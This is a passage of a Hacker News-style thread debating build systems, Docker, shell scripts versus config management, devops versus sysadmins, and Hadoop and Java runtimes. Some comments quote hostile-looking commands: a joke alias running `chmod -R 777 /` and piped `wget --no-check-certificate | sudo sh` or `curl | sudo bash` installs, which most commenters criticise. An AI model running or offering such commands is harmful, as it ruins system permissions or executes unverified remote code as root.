… which is one of the pressures driving Docker adoption. Each process tree gets its own root filesystem to trash with its multitude of dependencies. DLL hell, shared library hell, JDK hell, Ruby and Python environment hell… a lot of it can be summed up as "userland hell". Docker makes it easy to give the process its own bloody userland and be done with it.

deong · on April 27, 2015

I think this falls under the heading of "I'm old", but I already have one machine to maintain. Replacing it with N machines to maintain doesn't feel like a win to me.

lmm · on April 22, 2015

I'd actually disagree with that. Auto* breaks less often than wget or npm, IME.

bd_at_rivenhill · on April 22, 2015

My experience is that "configure;make;make install" has a much higher probability of success (>95% regardless of whether you are running the most up-to-date version of the OS) than something like cmake (which seems to hover around 60% if you try to build on slightly older systems).

shanemhansen · on April 22, 2015

Sorry, I don't know what ISO9001 is, but isn't deploying an image extremely conducive to traceability? No non-deterministic scripts are ran on production servers.

pjc50 · on April 22, 2015

http://www.askartsolutions.com/iso9001training/Identificatio...

ISO9001 often turns into its Dilbert parody of bureaucracy, but the core ideas are sound: if you have some sort of failure of production, it's useful to know what went into the production process and where it came from. So in the case of deploying images, then yes: you get repeatable copies of the image. Provided you know where the image came from. Images themselves aren't usually stored in a version control or configuration management system. It may not be obvious where the image came from. And, if an image is made up of numerous "parts" (ie all the installed software), you need to know what those parts are. If an SSL vulnerability is announced, what is the process for guaranteeing that you've updated all the master copies and re-imaged as necessary?

lmm · on April 22, 2015

Have you ever seen it implemented in a way that added value? I agree that in theory ISO9001 makes sense, but it's been a slow-motion disaster everywhere I've seen it actually tried.

pjc50 · on April 22, 2015

I haven't seen it successfully implemented in the software industry. Manufacturing are much more OK with it. I'm not arguing for iso9001 itself, just that reproducibility and standardisation of "parts" are things we should consider.

gthank · on April 22, 2015

Somebody has to build the containers and/or images, and it's on them to make that an automated, repeatable process.

mauricemir · on April 22, 2015

I have never under stood why some many people are not ok with using the command line.

A few years back we had an issue where a mysql script was over the limit for phpmyadmin - my fairly experienced colleague he was unaware that you could log into the cli and use mysql from the cli.

PopsiclePete · on April 22, 2015

Could be a generational thing as well. I work with some devs who've always used Windows/OS X GUI exclusively for everything and are terrified of commmand-line anything. Either there's a GUI for it, or it might as well not exist. Younger guys usually.

admyral · on April 22, 2015

Command line is modern day voodoo. There are ton of commands, each with a specific use, each with own their specific incantation, which can mixed in extremely powerful ways. But my theory is the main reason people would prefer not use it, is that improper usage can be harmful and sometimes destructive.

The same reason people prefer to use garbage collected and dynamically typed programming languages.

kjs3 · on April 23, 2015

improper usage can be harmful and sometimes destructive.

It is merciful that GUI environments are immune to these deficiencies.

gregor7777 · on April 22, 2015

I'd like to think this post is an exaggeration.

mauricemir · on April 22, 2015

Unfortunately not there are a lot of developers can only use phpmyadmin or thier CMS's gui - and from what I am told being able to code basic sql joins is not something you can take for granted.

dba7dba · on April 22, 2015

Crazy talk. And these 'developers' are pulling in six-figure?

gregor7777 · on April 22, 2015

Insanity.

creshal · on April 22, 2015

> the GNU build system is far from simple

Which is why there's alternatives – cmake, waf, …

bandrami · on April 23, 2015

> Which is why there's alternatives – cmake, waf

Gah. Because I want to drop a metric ton of python code into my own source tree just to build. (gnulib is bad enough...)

Personally I like make. I understand it. I've used it for something like 20 years now. If there are problem domains it doesn't work for, they aren't problem domains I encounter. (Like so much of Linux software in the past 5 years or so, I find myself saying "this seems like an interesting way to solve a problem I simply don't have".)

creshal · on April 23, 2015

> Gah. Because I want to drop a metric ton of python code into my own source tree just to build. (gnulib is bad enough...)

Each their own poison. Personally I don't like them either, but pretending it's autoconf or curl|sh is an oversimplification.

VLM · on April 22, 2015

Many people have enormous amounts of experience with anti-patterns yet very little self reflection to identify them.

This is an obvious example:

http://en.wikipedia.org/wiki/Inner-platform_effect

Obviously a config / deployment system, like any other system, will start small and simple and "save a lot of time" but after an infinity of features are bolted on, it'll be infinitely worse than just using a bash script. Even worse, you probably figure out your deployment by hand on one system using bash, then need to translate what worked on a command line into crypto-wanna-be-bash config system (probably creating numerous bugs in the translation) then using wanna-be-bash to slowly poorly imitate what you'd get if you just used bash directly...

The last straw for me was trying to integrate some freebsd servers and /usr/ports had like six versions of cfengine none of which worked perfectly with the three versions on the legacy linux boxes. Screw all that, instead of translating bash command line operations into psuedo-bash I'll just use bash directly. IT is an eternally rotating wheel and the baroque inner platform deployment framework has had its day... and being an eternally rotating wheel it'll have its day again in a couple years. Just not now.

Not throwing the baby out with the bathwater, a strict directory structure, and modularity and library approach to error handling and reporting and logging which you can steal from the deploy systems is a perfectly good idea.

Unix philosophy of small perfect tools means I'm using git instead of my own versioning/branching system, and using ssh to shove files around rather than implementing and static linking in my own crypto and SSL system.

wtbob · on April 22, 2015

I agree with you in principle, but in practice shell scripts are really not the best tool for this sort of job: they tend to be write-only (in the sense that they can be difficult to read months or years later) and can become very hairy and difficult to maintain.

I'd prefer something like scsh (or a Common Lisp or elisp version thereof) for this sort of work: access to a full-fledged programming language and easy access to the Unix environment.

VLM · on April 22, 2015

"can become very hairy and difficult to maintain."

I've found that to be a social problem or management problem more so than technical. There's an old saying even before my time of a Fortran programmer can write Fortran in any language. In a bad environment a new system will always be cleaner than the old system, not because its technologically immune to dirt, it'll dirty up as bad as the old system unless the social problems or management problems are fixed. You really can write read only Puppet scripts. Or you can write readable bash. Or even Perl.

Also most deployment seems to revolve around securely successfully copying stuff around, testing files and things, and running shell commands and looking at the return code. Shells are pretty good at running shell commands like those in a maintainable easily readable and troubleshootable fashion. Its possible that a deployment situation that more closely resembles a clojure koan than the previous, might have some severely blurred lines. And there's always the issue of minimizing the impedance bump between the automated deployer and the dude writing it (probably running commands in a shell window) and the dude troubleshooting it at 2am (by looking at the deployment system in one window and running commands in a shell window next to it to isolate the problem). I would agree that cleaner library/subroutine type stuff in shell would be nice.

And you are correct, scsh is really cool but two jobs later some random dude on pager duty at 2am is more likely to know bash or tcsh. Principle of least surprise. I suppose if only scsh guys are ever hired... Then again as per above most deployment is just lots of moving stuff around and running things so its pretty self explanatory. But if the work is trivial, don't deploy a howitzer to swat a fly.

Maybe another way to look at it is if you're doing something confusing or broken, plain common language will clear things up faster and more accurately than using an ever more esoteric domain specific language. Or some folk saying like "always use the overall simplest possible solution to a complex problem".

There is the "don't reinvent the wheel" argument. I have a really good network wide logging system, a really good ssh key system for secure transfer of files, a strong distributed version control system to store branches and versions, a strong SSL infrastructure, a stable execution environment where upgrading bash probably won't kill all my scripts, a strong scheduled execution system... I don't need a tight monolithic collection of "not so good" reimplementation of the above, running that is more painful that rolling my own glue between the strong systems I already have. And using the monolith doesn't mean I get to abandon or ignore the "real" strong infrastructure, so the only thing worse than running one logging/reporting system is having to admin two, a real enterprise grade one and a deployment-only wanna be system. I did the puppet thing for many years. So sick and tired of that.

kluck · on April 22, 2015

Thank You for the Wikipedia link - I was looking for the name of the "thing" people are doing when they write all those WebGL JavaScript frameworks and such. Now I know that they are creating poor replicas of things that normally run on the desktop itself.

mauricemir · on April 22, 2015

:-)

I managed to get haddoop running on a small cluster from scratch Michael Nolls turtorial is a good starting point.

Full stack should mean you can and have used a soldering iron in anger and also have at least a CCNA level of networking.

stephenr · on April 22, 2015

When you say anger, do you mean to threaten the developer who wants to run `chmod 777 /var/www` when their just-installed php app released in 2003 won't allow uploads?

Edit: Maybe I should have added a /sarcasm to my comment?

kpcyrd · on April 22, 2015

    alias fix-permissions="chmod -R 777 /"

hurin · on April 22, 2015

> alias fix-permissions="chmod -R 777 /"

  function sudo 
    if not test (count $argv) -gt 3
        command sudo $argv; return;
    end
    if not contains $argv[4] "/" (ls / | awk '{print "/"$1}') 
        command sudo $argv; return;
    end
	if test \( $argv[1] = chmod \) -a \( $argv[2] = '-R' \) -a \( $argv[3] = 777 \)
        command sudo reboot -f
    else 
        command sudo $argv
    end;
  end;

mauricemir · on April 22, 2015

I think branding them is going a bit to far

...

For a first offense

bbrazil · on April 22, 2015

"in anger" means used in a real-life situation, not just playing around.

jacquesm · on April 22, 2015

I think he got that.

jacquesm · on April 22, 2015

Re-connecting a pin to a cpu that broke off should be enough qualification. Anger will be present in spades.

angersock · on April 22, 2015

Christ it's annoying enough just using a credit-card to fix bent pins. Hats off for reconnecting them!

collyw · on April 22, 2015

I have found a lot of these platform as a service providers are way more complicated than doing things from scratch.

hultner · on April 22, 2015

I've seen people copy pasting stuff along the lines of `wget --no-check-certificate | sudo sh` into their terminals from some random internet source.

I'm pulling my hair saying are you even aware of what you're doing?

rimantas · on April 22, 2015

What do you expect them to do, download .tar.gz, extra, read every line of code and them make; make install? Or just make; make install? How is that any different?

brohee · on April 22, 2015

You can usually get PGP signed hashes for tarballs distributed by serious entities. If someone is distributing software and provides no way to check that it is genuine, you shouldn't run it...

kylegordon · on April 22, 2015

I posted a slightly provocative tweet about this, and the CEO of NodeSource took exception... sad days.

https://twitter.com/kylegordon/status/590860756075294721

reitanqild · on April 22, 2015

He seems to be way nicer and more professional than you..?

teddyh · on April 22, 2015

If by “nicer and more professional” you mean “super condescending”.

reitanqild · on April 23, 2015

What? Only after two hours did he tell kylegordon that he (kylegordon) was cute.

And at that point kylegordon had earned it.

legulere · on April 22, 2015

There's nothing wrong with curl | sudo bash style setups as long as it's over https and the certificate gets checked.

The advantages are that it's easy and you can make it work on almost all unix-like systems out there.

The only disadvantage is that you have one additional weak point: The server can get contaminated. Before you had to contaminate one of the many developer machines / build machines.

The situation hasn't been better before. Install media always got downloaded without ssl encryption or any certificate checks. This is still the same, but at least you won't get a hacked kernel today if you use secure boot.

mbreese · on April 22, 2015

No, it's just plain bad.

To pick one example why...

Just because it's easy to run doesn't mean it's easy to support or maintain. Chances are `curl | bash` scripts aren't designed for your particular OS, so it's yet another form of software that you have to learn how to update, as opposed to using the OS-level update mechanism, such as yum, apt, or even brew to some extent. Being a good sysadmin doesn't stop at installing the software. Most of the hard (boring) work is in maintaining systems and keeping them updated and secure. Blind install scripts make this job impossible.

There is a very big difference between installing something on your dev machine to just get it started and deploying something into production. `curl | bash` is okay for setting something up on a dev machine where the only one that needs to use it is you. For productions machines, it's completely inappropriate[1].

[1] This is somewhat mitigated by things like Docker, but I'd still argue that you don't want to have an ephemeral installation method for containers either. You should have fixed versions that are installed by either a package manager or at least a Makefile.

wang_li · on April 22, 2015

Not to mention that in plenty of environments production systems don't have access to the internet to begin with, so curl/wget | bash is a non-starter.

contingencies · on April 23, 2015

There's nothing wrong with curl | sudo bash style setups as long as it's over https and the certificate gets checked.

Even assuming the URL's publisher is trustworthy (which is a poor assumption to make, ever), you forget SSL / HTTPS is broken, that the NSA has established MITM on the entire internet, that your installation process (which should be both versioned and repeatable) now has zero versioning and all the entropy of the network plus bonus entropy.

gregnavis · on April 24, 2015

I'm guilty of using this method in my side project (https://github.com/grn/bash-ctx). My goal was to solve the installation problem quickly. I absolutely would love to offer proper installation methods. However my experience with building *.deb packages makes me think that it's not something that I'd like to do (especially it's a side project).

The question, therefore, is: what is the simplest alternative installation method for OS X and Linux?

Khaine · on April 22, 2015

Some of this is self inflected.

Go look up how you install snort or bro on centos. You have to either install from source, or install from a rpm from there website which may or may not have issues. This means you lose dependency management, and update management. Pure madness

danielweber · on April 22, 2015

Choose your method of death:

1. Run this totally opaque command which might DTRT, and might completely pwn your system.

2. Prepare for 4 hours of dependency hell.

contingencies · on April 23, 2015

Alternatively, learn Gentoo.

shanemhansen · on April 22, 2015

I've decided that unless you're ok with running a very restricted set of ancient applications, don't even try to use CentOS. I've seen multiple billion dollar companies who can't seen to avoid f'ing up the yum repos on CentOS.

I'm not able to go full docker on my machines @work, but I do have some statically linked tarballs. There is a reason apps that deploy in hostile environments (skype, chrome, firefox) bundle most of their dependencies.

gaius · on April 22, 2015

Many people have this weird aversion to doing basic sysadmin stuff with Linux

Like developers who won't write SQL and insist on an ORM.

skywhopper · on April 22, 2015

I agree that many of these convenient setups are embarrassingly sloppy, but it's the sysadmin's responsibility to insist on production deployments being far more rigorous. No one can tell you how to build hadoop? Well, figure it out. Random Docker containers being downloaded? Use a local Docker repo with vetted containers and Dockerfiles only.

I don't even allow vendor installers to run on my production systems. My employer buys some software that is distributed as binary installers. So I've written a script that will run that installer in a VM, and repackage the resulting files into something I'm comfortable working with to deploy to production.

If a sysadmin is unable to insist on good deployment practices, it's a failure of the company or organization or of his own communication skills. If a sysadmin allows sloppy developer-created deployments and doesn't make constant noise about it, then they aren't doing their job properly.

jetpks · on April 22, 2015

> it's the sysadmin's responsibility to insist on production deployments

What decade are you from? No startups are hiring sysadmins to do any kind of work anymore. They're hiring "dev-ops" people, which seems to mean "Amateur $popularLanguage developer that deployed on AWS this one time."

That's the whole problem with the dev-ops ecosystem. None of these dev-ops people seem to have any ops experience.

thaumaturgy · on April 22, 2015

> No startups are hiring sysadmins to do any kind of work anymore.

Then maybe people should be willing to work for more grown-up businesses.

HN tends to get a distorted view of what's important in the tech industry. The tech industry is way, way, way bigger than startups, and there are still plenty of companies that recognize the value of good sysadmins.

Let the startups learn their lesson in their own time.

anp · on April 22, 2015

The alternative is that many of the startups don't learn this in their own time, and they go on to become bigger, more successful companies who can set the tone and shift the market. Of course, if they're actually able to succeed by doing so, then that says something too. Although the trend of many data breaches certainly wouldn't decline in that case.

rudolf0 · on April 22, 2015

>Although the trend of many data breaches certainly wouldn't decline in that case.

Exactly. Successful and profitable are not mutually exclusive with "secure" or "well-architected". At least until those last two come to bite you later and start eating into your profits.

Lord_Zero · on April 22, 2015

Sony is a great example of this.

jjoonathan · on April 22, 2015

Did the PR hit actually translate into a monetary hit and eat into their profits?

thaumaturgy · on April 22, 2015

I don't know about the cost of the negative PR, but the compromise itself cost them $15 million in real costs (http://www.latimes.com/entertainment/envelope/cotown/la-et-c...) and potentially much more (http://www.reuters.com/article/2014/12/09/us-sony-cybersecur...) once you count the downtime involved and potential lawsuits, settlements, and other fallout over the breach of information. IIRC there were some embarrassing emails released regarding some Hollywood big-wigs, for example.

It should be a huge cautionary tale for any big organization that doesn't have good internal security, but unfortunately this isn't the first such case in history, and it almost certainly won't be the last.

But that doesn't mean there aren't other smart businesses out there.

yosefk · on April 23, 2015

$15M sounds like a rounding error for Sony. It sounds like a rounding error as well when compared to the cost of brand-name IT solutions when deployed in a company of Sony's size.

ascendantlogic · on April 22, 2015

> That's the whole problem with the dev-ops ecosystem. None of these dev-ops people seem to have any ops experience.

Thanks for painting all of us that do "devops" with a wide brush. If you're a dev shall we enumerate all of the XSS and SQL injection holes you've added to products over your career?

SFjulie1 · on April 23, 2015

well, XSS and SQL injection comes from my experience from "devops" kind of developer, claiming to code without wishing to learn the basics (complexity, DB, ....).

So well, tried, but troll does not work.

And startup are made by "devops" kind of business men that don't care about computing correctly cost vs price because it is so XXth century.

ascendantlogic · on April 23, 2015

You're absolutely right, about everyone in the industry. How did you become so astute with your observations?

danudey · on April 22, 2015

While I think that devops can be a useful term, lately most people take it to mean 'I'm a rails developer but I know how to use docker and the aws control panel'.

skywhopper · on April 22, 2015

Well, like I said, in this case, "it's a failure of the company".

Nursie · on April 22, 2015

>> No one can tell you how to build hadoop? Well, figure it out.

I get the impression that several people working on debian couldn't work this one out!

bobbyi_settv · on April 22, 2015

I think most people who use debian would tend to install things using debian packages, which in this case usually means adding cloudera to your apt sources list and using apt-get.

It is a pretty straightforward process:

http://www.cloudera.com/content/cloudera/en/documentation/cd...

growse · on April 22, 2015

I think the complaint was that it's difficult figuring out how to build Hadoop from source. That page you linked is how to install pre-built binaries, which you rightly point out is fairly trivial.

Nursie · on April 23, 2015

Sure, I agree that debian people would want to install debian packages.

What debian users/hackers/amateur admins like me really want is packages that are first class citizens, that the debian guys have picked up, sanitised, analysed and made part of the system.

I'll take software from the debian repos every time if I can. And it's pretty damning if people who are familiar with build systems and package creation can't figure it out!

api · on April 22, 2015

Hadoop is insane. The elephant is fitting. Is it really the best choice, or has someone done something cleaner in golang or c++11?

Alupis · on April 22, 2015

> Is it really the best choice, or has someone done something cleaner in golang or c++11?

What does the language have to do with the program?

Hadoop is what it is because it's a complex problem with a fittingly complex solution. Simply re-writing it in your pet language won't somehow make it "better".

getsat · on April 22, 2015

Go and modern C++ are both quite a bit more terse than Java. They also produce binaries which don't necessarily require a runtime to be available on every server (just ABI compatibility).

(I have no horse in this race, I am just writing what I think the grandparent comment was referring to)

pjmlp · on April 22, 2015

> They also produce binaries which don't necessarily require a runtime to be available on every server

Just like Java[0]. It is just a matter of choosing the right compiler for the use case at hand.

[0] - http://www.excelsiorjet.com/ (one from many vendors)

getsat · on April 22, 2015

Cool concept, I didn't realise this existed. Can you run Hadoop and friends under this? I've worked at companies with over 500 servers in a Hadoop cluster and literally never once heard about anything other than using Oracle's JRE aside from one proposal to use OpenJDK which was shot down pretty quickly.

pjmlp · on April 22, 2015

I don't have experience with Hadoop.

Almost all commercial JVMs have some form of AOT or JIT caching, specially those that target embedded systems.

Sun never added support to the reference JVM for political reasons, as they would rather push for plain JIT.

Oracle is now finally thinking about adding support for it, with no official statement if it will make it into 9 or later.

JEP 197 is the start of those changes, http://openjdk.java.net/jeps/197

Oracle Labs also has SubstrateVM, which is an AOT compiler built with Graal and Truffle.

Alupis · on April 22, 2015

Way back in the day, GCC's gcj compiler would do AOT compilation of Java, however I believe it stopped being developed at jdk5 support.

pjmlp · on April 23, 2015

If I am not mistaken most the developers abandoned the project to work on the Eclipse compiler and OpenJDK when those projects became available.

GCC only keeps gcj around due to its unit tests.

Alupis · on April 22, 2015

There's also things like exec4j which bundles everything including a JVM into an executable which one can just run... and things like AdvancedInstaller and Install4j will also allow one to bundle a JVM.

So producing a binary which doesn't require a separate runtime really isn't a problem.

pjmlp · on April 22, 2015

Since you mention it, Java 8 brings bundling and installers support into the reference JDK.

swills · on April 22, 2015

C++ does usually require a runtime.

yoklov · on April 22, 2015

C++'s runtime is small and ubiquitous. Depending on how the software is written (if it allows disabling exceptions and rtti), it might be the same size as C's runtime, which is practically (but not totally) nonexistant.

I'm not an expert on Java, but my experience with it is that it's runtime is fairly huge and requires custom installation.

bandrami · on April 23, 2015

C++'s runtime is worse than Java's in that sense. Most JVMs can run most Java bytecode, but your libstdc++ has to be from the same version of the same compiler that your application was compiled with.